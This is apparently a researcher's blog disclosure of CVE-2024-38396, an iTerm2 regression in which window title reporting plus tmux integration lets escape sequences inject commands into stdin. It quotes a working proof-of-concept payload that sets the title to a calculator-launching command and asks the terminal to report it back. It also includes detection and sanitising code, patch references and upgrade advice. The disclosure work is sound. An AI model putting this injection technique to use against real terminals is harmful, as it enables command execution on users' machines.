Regression turned into RCE

I am skipping an introduction to escape sequences here as I recently wrote more about them in my previous post. From a security perspective, they are to terminal emulators what XSS is to browsers.

This post is about a new bug, CVE-2024-38396, which affects only iTerm2 3.5.0 and 3.5.1 (released on May 20 and June 11 respectively) and was introduced by a regression.

In versions prior to 3.5.0, window title reporting was disabled. So you could not just use the following to retrieve the title of the terminal window and put it in stdin:

$ echo -e "\e[21t"

Note: David Leadbeater also independently noticed this regression and reported it here.

What is wrong with window title reporting?

The OSC 2 escape sequence (ESC ] 2 ; title BEL) sets the window title; OSC 0, used in the example below, sets both the icon name and the window title.

An example:

echo -e "\033]0;This is the window title\a"

CSI 21 t asks the terminal to report that title back, and the reply lands in stdin as shown above. This makes exploitation very easy: at this point all that is required is for the user to hit Enter, and whatever command text was placed in that title will happily execute.

Patch that disables title reporting by default: f1e89f78

Tmux integration made it worse

iTerm2's native tmux integration (enabled by default) had a weakness that allowed the reported title to be sneaked in and also provided a way to send newlines after the title was reported, so the injected text no longer depended on the user pressing Enter.

Patch: fc60236a

Can I haz that sweet PoC plz?

Try this out yourself:

docker run --rm vin01/escape-seq-test:cve-2024-38396

or

cat poc-iterm2-rce.txt

Download poc-iterm2-rce.txt

The file contains this payload:

\033]2;s&open -aCalculator&\a\033[21t \x1bP1000p%session-changed s

It sets s&open -aCalculator& as the window title (OSC 2), then asks the terminal to report it back (CSI 21 t) so that it lands in stdin and executes, popping a calculator. The trailing \x1bP1000p%session-changed s fragment goes through the tmux integration weakness described above.

Source code: https://github.com/vin01/poc-cve-2024-38396
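As an added illustration (not part of the original post or the PoC repository), here is a small Python scanner that parses the CSI, OSC and DCS sequences in untrusted input, flags the set-title-then-CSI 21 t chain that the payload above relies on, and strips sequences before display; the payload bytes are reconstructed from the one quoted above.

```python
import re

# Sequence families involved (xterm ctlseqs naming):
#   CSI  ESC [ params intermediates final-byte   e.g. CSI 21 t (report title)
#   OSC  ESC ] text, ended by BEL or ST (ESC \)   e.g. OSC 2 ; title (set title)
#   DCS  ESC P text, ended by ST; left unterminated it swallows the rest of input
ESC_SEQ = re.compile(
    rb"\x1b\[[0-?]*[ -/]*[@-~]"             # CSI
    rb"|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"   # OSC
    rb"|\x1bP(?:.*?\x1b\\|.*)"               # DCS (terminated or not)
    rb"|\x1b[@-Z\\\]^_]",                    # any other 7-bit ESC Fe sequence
    re.DOTALL,
)

def classify(seq: bytes) -> str:
    """Name the sequences the post discusses; everything else is generic."""
    if seq.startswith(b"\x1b]"):
        body = seq[2:].rstrip(b"\x07").removesuffix(b"\x1b\\")
        ps = body.split(b";", 1)[0]
        return "set-title" if ps in (b"0", b"2") else "osc"
    if seq.startswith(b"\x1b["):
        is_report = seq.endswith(b"t") and seq[2:-1].split(b";")[0] == b"21"
        return "report-title" if is_report else "csi"
    if seq.startswith(b"\x1bP"):
        return "dcs"  # e.g. the tmux-integration fragment in the PoC
    return "other"

def scan(data: bytes) -> list:
    """All escape sequences in data, as (kind, raw bytes) pairs, in order."""
    return [(classify(m.group(0)), m.group(0)) for m in ESC_SEQ.finditer(data)]

def is_title_reflection(data: bytes) -> bool:
    """True when a title is set and CSI 21 t follows it: the chain that turns
    attacker-chosen text into stdin on a terminal with title reporting enabled."""
    kinds = [k for k, _ in scan(data)]
    return "set-title" in kinds and "report-title" in kinds[kinds.index("set-title"):]

def sanitize(data: bytes) -> bytes:
    """Strip every escape sequence, e.g. before cat-ing an untrusted file."""
    return ESC_SEQ.sub(b"", data)

# The PoC payload quoted in the post, reconstructed as bytes for this demo.
POC = (b"\x1b]2;s&open -aCalculator&\x07"  # OSC 2: set the window title
       b"\x1b[21t "                         # CSI 21 t: ask the terminal to report it
       b"\x1bP1000p%session-changed s")     # tmux-integration DCS fragment

if __name__ == "__main__":
    for kind, seq in scan(POC):
        print(f"{kind:13} {seq!r}")
    print("title reflection:", is_title_reflection(POC), "| sanitized:", sanitize(POC))
```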

A fix released within 2 days of reporting

Upgrade to iTerm2 3.5.2: https://iterm2.com/downloads.html

Please think twice before you enable the "Terminal may report window title" setting in iTerm2. It might not be worth the security risk: it allows arbitrary text to end up in stdin, which is never a good idea.